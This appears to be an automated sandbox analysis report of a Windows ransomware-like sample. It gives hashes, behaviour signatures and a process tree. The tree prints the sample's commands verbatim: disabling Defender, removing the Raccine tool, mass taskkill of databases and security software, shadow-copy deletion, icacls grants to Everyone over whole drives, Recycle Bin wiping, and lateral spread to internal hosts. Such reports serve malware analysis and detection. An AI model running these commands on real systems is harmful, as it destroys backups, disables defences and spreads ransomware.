Analysis

  • max time kernel
    24s
  • max time network
    148s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    28-05-2021 09:57

General

  • Target

    48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

  • Size

    353KB

  • MD5

    3de060c1a25fb75735767e9450ed797d

  • SHA1

    8c0e899fc89aa8e0201aa8ee4ba41cd05702116e

  • SHA256

    48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698

  • SHA512

    4792c3c919c87269544bbe60b62930059f71421eae0a736113e4472e14cfebf95b16ebc430e441a88655fcb84397d5959367061e59d58deaf26de43915eea37b

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs
  • Modifies file permissions 1 TTPs 14 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
    "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3964
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
        PID:2248
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
        2⤵
          PID:1240
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
          2⤵
            PID:2528
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
            2⤵
              PID:3876
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
              2⤵
                PID:2476
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3468
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3508
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1428
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4196
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                2⤵
                  PID:1764
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                  2⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4280
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                  2⤵
                    PID:4372
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4488
                  • C:\Windows\SYSTEM32\taskkill.exe
                    "taskkill" /F /IM RaccineSettings.exe
                    2⤵
                      PID:4544
                    • C:\Windows\SYSTEM32\reg.exe
                      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
                      2⤵
                        PID:4992
                      • C:\Windows\SYSTEM32\reg.exe
                        "reg" delete HKCU\Software\Raccine /F
                        2⤵
                        • Modifies registry key
                        PID:5064
                      • C:\Windows\SYSTEM32\schtasks.exe
                        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
                        2⤵
                          PID:4108
                        • C:\Windows\SYSTEM32\sc.exe
                          "sc.exe" config Dnscache start= auto
                          2⤵
                            PID:4608
                          • C:\Windows\SYSTEM32\netsh.exe
                            "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                            2⤵
                              PID:4696
                            • C:\Windows\SYSTEM32\sc.exe
                              "sc.exe" config FDResPub start= auto
                              2⤵
                                PID:3432
                              • C:\Windows\SYSTEM32\sc.exe
                                "sc.exe" config SQLTELEMETRY start= disabled
                                2⤵
                                  PID:4332
                                • C:\Windows\SYSTEM32\sc.exe
                                  "sc.exe" config SSDPSRV start= auto
                                  2⤵
                                    PID:4404
                                  • C:\Windows\SYSTEM32\sc.exe
                                    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                    2⤵
                                      PID:4692
                                    • C:\Windows\SYSTEM32\sc.exe
                                      "sc.exe" config SstpSvc start= disabled
                                      2⤵
                                        PID:5100
                                      • C:\Windows\SYSTEM32\sc.exe
                                        "sc.exe" config upnphost start= auto
                                        2⤵
                                          PID:4132
                                        • C:\Windows\SYSTEM32\sc.exe
                                          "sc.exe" config SQLWriter start= disabled
                                          2⤵
                                            PID:2008
                                          • C:\Windows\SYSTEM32\taskkill.exe
                                            "taskkill.exe" /IM mspub.exe /F
                                            2⤵
                                            • Kills process with taskkill
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4480
                                          • C:\Windows\SYSTEM32\taskkill.exe
                                            "taskkill.exe" /IM synctime.exe /F
                                            2⤵
                                              PID:732
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM mspub.exe /F
                                              2⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4932
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM mydesktopqos.exe /F
                                              2⤵
                                              • Kills process with taskkill
                                              PID:4988
                                            • C:\Windows\SYSTEM32\taskkill.exe
                                              "taskkill.exe" /IM mysqld.exe /F
                                              2⤵
                                                PID:4132
                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                "taskkill.exe" /IM Ntrtscan.exe /F
                                                2⤵
                                                  PID:2196
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  "taskkill.exe" /IM firefoxconfig.exe /F
                                                  2⤵
                                                  • Kills process with taskkill
                                                  PID:2188
                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                  "taskkill.exe" /IM mydesktopservice.exe /F
                                                  2⤵
                                                    PID:4752
                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                    "taskkill.exe" /IM sqbcoreservice.exe /F
                                                    2⤵
                                                      PID:3004
                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                      "taskkill.exe" /IM isqlplussvc.exe /F
                                                      2⤵
                                                      • Kills process with taskkill
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2248
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        3⤵
                                                          PID:4992
                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                        "taskkill.exe" /IM agntsvc.exe /F
                                                        2⤵
                                                        • Kills process with taskkill
                                                        PID:4660
                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                        "taskkill.exe" /IM steam.exe /F
                                                        2⤵
                                                        • Kills process with taskkill
                                                        PID:4916
                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                        "taskkill.exe" /IM sqlwriter.exe /F
                                                        2⤵
                                                          PID:4864
                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                          "taskkill.exe" /IM thebat.exe /F
                                                          2⤵
                                                          • Kills process with taskkill
                                                          PID:4484
                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                          "taskkill.exe" /IM onenote.exe /F
                                                          2⤵
                                                            PID:4908
                                                          • C:\Windows\SYSTEM32\taskkill.exe
                                                            "taskkill.exe" /IM encsvc.exe /F
                                                            2⤵
                                                            • Kills process with taskkill
                                                            PID:4652
                                                          • C:\Windows\SYSTEM32\taskkill.exe
                                                            "taskkill.exe" /IM tbirdconfig.exe /F
                                                            2⤵
                                                            • Kills process with taskkill
                                                            PID:4500
                                                          • C:\Windows\SYSTEM32\taskkill.exe
                                                            "taskkill.exe" /IM ocomm.exe /F
                                                            2⤵
                                                            • Kills process with taskkill
                                                            PID:4772
                                                          • C:\Windows\SYSTEM32\taskkill.exe
                                                            "taskkill.exe" /IM PccNTMon.exe /F
                                                            2⤵
                                                            • Kills process with taskkill
                                                            PID:5100
                                                          • C:\Windows\SYSTEM32\taskkill.exe
                                                            "taskkill.exe" /IM excel.exe /F
                                                            2⤵
                                                              PID:4548
                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                              "taskkill.exe" /IM dbeng50.exe /F
                                                              2⤵
                                                                PID:3540
                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                "taskkill.exe" /IM infopath.exe /F
                                                                2⤵
                                                                • Kills process with taskkill
                                                                PID:3876
                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                "taskkill.exe" /IM msaccess.exe /F
                                                                2⤵
                                                                  PID:4208
                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                  "taskkill.exe" /IM CNTAoSMgr.exe /F
                                                                  2⤵
                                                                  • Kills process with taskkill
                                                                  PID:2088
                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                  "taskkill.exe" /IM thebat64.exe /F
                                                                  2⤵
                                                                    PID:3632
                                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                                    "taskkill.exe" /IM mbamtray.exe /F
                                                                    2⤵
                                                                    • Kills process with taskkill
                                                                    PID:2288
                                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                                    "taskkill.exe" IM thunderbird.exe /F
                                                                    2⤵
                                                                      PID:1444
                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                      "taskkill.exe" /IM outlook.exe /F
                                                                      2⤵
                                                                        PID:1252
                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                        "taskkill.exe" /IM dbsnmp.exe /F
                                                                        2⤵
                                                                        • Kills process with taskkill
                                                                        PID:1820
                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                        "taskkill.exe" /IM tmlisten.exe /F
                                                                        2⤵
                                                                        • Kills process with taskkill
                                                                        PID:4764
                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                        "taskkill.exe" /IM wordpad.exe /F
                                                                        2⤵
                                                                          PID:5056
                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                          "taskkill.exe" /IM zoolz.exe /F
                                                                          2⤵
                                                                            PID:3956
                                                                          • C:\Windows\SYSTEM32\netsh.exe
                                                                            "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                                                            2⤵
                                                                              PID:1472
                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                              "taskkill.exe" /IM xfssvccon.exe /F
                                                                              2⤵
                                                                              • Kills process with taskkill
                                                                              PID:4244
                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                              "taskkill.exe" /IM mysqld-opt.exe /F
                                                                              2⤵
                                                                              • Kills process with taskkill
                                                                              PID:3212
                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                              "taskkill.exe" /IM msftesql.exe /F
                                                                              2⤵
                                                                              • Kills process with taskkill
                                                                              PID:5000
                                                                            • C:\Windows\SYSTEM32\taskkill.exe
                                                                              "taskkill.exe" /IM powerpnt.exe /F
                                                                              2⤵
                                                                                PID:500
                                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                                "taskkill.exe" /IM ocautoupds.exe /F
                                                                                2⤵
                                                                                • Kills process with taskkill
                                                                                PID:4532
                                                                              • C:\Windows\SYSTEM32\taskkill.exe
                                                                                "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                2⤵
                                                                                  PID:1564
                                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                                  "taskkill.exe" /IM ocssd.exe /F
                                                                                  2⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:4576
                                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                                  "taskkill.exe" /IM visio.exe /F
                                                                                  2⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:4948
                                                                                • C:\Windows\SYSTEM32\taskkill.exe
                                                                                  "taskkill.exe" /IM oracle.exe /F
                                                                                  2⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:4248
                                                                                • C:\Windows\SYSTEM32\arp.exe
                                                                                  "arp" -a
                                                                                  2⤵
                                                                                    PID:4260
                                                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                                                    "taskkill.exe" /IM sqlagent.exe /F
                                                                                    2⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:4820
                                                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                                                    "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                    2⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:4476
                                                                                  • C:\Windows\SYSTEM32\taskkill.exe
                                                                                    "taskkill.exe" /IM winword.exe /F
                                                                                    2⤵
                                                                                      PID:2560
                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                      "taskkill.exe" /IM sqlbrowser.exe /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:4776
                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                      "taskkill.exe" /IM mysqld-nt.exe /F
                                                                                      2⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:3928
                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                      "taskkill.exe" /IM sqlservr.exe /F
                                                                                      2⤵
                                                                                        PID:4892
                                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                                        "taskkill.exe" /IM ragent.exe /f
                                                                                        2⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:4104
                                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                                        "taskkill.exe" /IM rmngr.exe /f
                                                                                        2⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:2936
                                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                                        "taskkill.exe" /IM rphost.exe /f
                                                                                        2⤵
                                                                                        • Kills process with taskkill
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1240
                                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                                        "taskkill.exe" /IM 1cv8.exe /f
                                                                                        2⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:4976
                                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                                        "taskkill.exe" /IM sql.exe /f
                                                                                        2⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:4308
                                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                                        "taskkill.exe" /IM sqld.exe /f
                                                                                        2⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:3092
                                                                                      • C:\Windows\SYSTEM32\taskkill.exe
                                                                                        "taskkill.exe" /IM mysql.exe /f
                                                                                        2⤵
                                                                                          PID:4276
                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                          "taskkill.exe" /IM mysqld.exe /f
                                                                                          2⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:2192
                                                                                        • C:\Windows\SYSTEM32\taskkill.exe
                                                                                          "taskkill.exe" /IM oracle.exe /f
                                                                                          2⤵
                                                                                            PID:4684
                                                                                          • C:\Windows\SYSTEM32\taskkill.exe
                                                                                            "taskkill.exe" /IM vmwp.exe /f
                                                                                            2⤵
                                                                                              PID:2088
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                                                                              2⤵
                                                                                                PID:4768
                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                "icacls" "C:*" /grant Everyone:F /T /C /Q
                                                                                                2⤵
                                                                                                • Modifies file permissions
                                                                                                PID:1516
                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                "icacls" "D:*" /grant Everyone:F /T /C /Q
                                                                                                2⤵
                                                                                                • Modifies file permissions
                                                                                                PID:5084
                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                "icacls" "Z:*" /grant Everyone:F /T /C /Q
                                                                                                2⤵
                                                                                                • Modifies file permissions
                                                                                                PID:4796
                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpCF8A.bat
                                                                                                2⤵
                                                                                                  PID:5004
                                                                                                  • C:\Windows\system32\mountvol.exe
                                                                                                    mountvol
                                                                                                    3⤵
                                                                                                      PID:4708
                                                                                                    • C:\Windows\system32\find.exe
                                                                                                      find "}\"
                                                                                                      3⤵
                                                                                                        PID:4612
                                                                                                      • C:\Windows\system32\mountvol.exe
                                                                                                        mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
                                                                                                        3⤵
                                                                                                          PID:4984
                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                          ping -n 2 127.0.0.1
                                                                                                          3⤵
                                                                                                          • Runs ping.exe
                                                                                                          PID:3784
                                                                                                        • C:\Windows\system32\mountvol.exe
                                                                                                          mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
                                                                                                          3⤵
                                                                                                            PID:4956
                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                            ping -n 2 127.0.0.1
                                                                                                            3⤵
                                                                                                            • Runs ping.exe
                                                                                                            PID:4464
                                                                                                          • C:\Windows\system32\mountvol.exe
                                                                                                            mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
                                                                                                            3⤵
                                                                                                              PID:4344
                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                              ping -n 2 127.0.0.1
                                                                                                              3⤵
                                                                                                              • Runs ping.exe
                                                                                                              PID:4540
                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                            "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                                                                                                            2⤵
                                                                                                              PID:5020
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                3⤵
                                                                                                                  PID:3432
                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                "cmd.exe" /c rd /s /q D:\\$Recycle.bin
                                                                                                                2⤵
                                                                                                                  PID:5044
                                                                                                                • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                                                                                                  2⤵
                                                                                                                    PID:4380
                                                                                                                  • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
                                                                                                                    2⤵
                                                                                                                      PID:1236
                                                                                                                    • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                                                                                                      2⤵
                                                                                                                        PID:4320
                                                                                                                      • C:\Windows\SYSTEM32\netsh.exe
                                                                                                                        "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                                                                                                        2⤵
                                                                                                                          PID:2212
                                                                                                                        • C:\Windows\SYSTEM32\arp.exe
                                                                                                                          "arp" -a
                                                                                                                          2⤵
                                                                                                                            PID:2328
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.38 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                            2⤵
                                                                                                                              PID:3816
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.10 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                              2⤵
                                                                                                                                PID:4840
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.36 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                                2⤵
                                                                                                                                  PID:4792
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.11 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                                  2⤵
                                                                                                                                    PID:2560
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.39 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:4532
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.18 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                                      2⤵
                                                                                                                                        PID:4312
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          3⤵
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:732
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.24 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                                        2⤵
                                                                                                                                          PID:4788
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.30 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                                          2⤵
                                                                                                                                            PID:4564
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.21 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                                            2⤵
                                                                                                                                              PID:4208
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.27 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3876
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\bq52qigh.exe" \\10.10.0.41 -d -f -h -s -n 5 -c "C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
                                                                                                                                              2⤵
                                                                                                                                                PID:4232
                                                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                                                "icacls.exe" C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_0 /grant Everyone:F /T /C /Q
                                                                                                                                                2⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:1764
                                                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                                                "icacls.exe" C:\vcredist2010_x64.log-MSI_vc_red.msi.txt /grant Everyone:F /T /C /Q
                                                                                                                                                2⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:4272
                                                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                                                "icacls.exe" C:\vcredist2010_x64.log.html /grant Everyone:F /T /C /Q
                                                                                                                                                2⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:5652
                                                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                                                "icacls.exe" C:\vcredist2012_x64_0_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
                                                                                                                                                2⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:4896
                                                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                                                "icacls.exe" C:\vcredist2012_x64_1_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
                                                                                                                                                2⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:4100
                                                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                                                "icacls.exe" C:\vcredist2013_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
                                                                                                                                                2⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:5700
                                                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                                                "icacls.exe" C:\vcredist2013_x64_001_vcRuntimeAdditional_x64.log /grant Everyone:F /T /C /Q
                                                                                                                                                2⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:4904
                                                                                                                                              • C:\Windows\SYSTEM32\icacls.exe
                                                                                                                                                "icacls.exe" C:\vcredist2019_x64_000_vcRuntimeMinimum_x64.log /grant Everyone:F /T /C /Q
                                                                                                                                                2⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:4276
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              1⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:4544
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              1⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2476
                                                                                                                                            • C:\Windows\PAExec-5084-RJMQBVDN.exe
                                                                                                                                              C:\Windows\PAExec-5084-RJMQBVDN.exe -service
                                                                                                                                              1⤵
                                                                                                                                                PID:4132
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4988
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1128
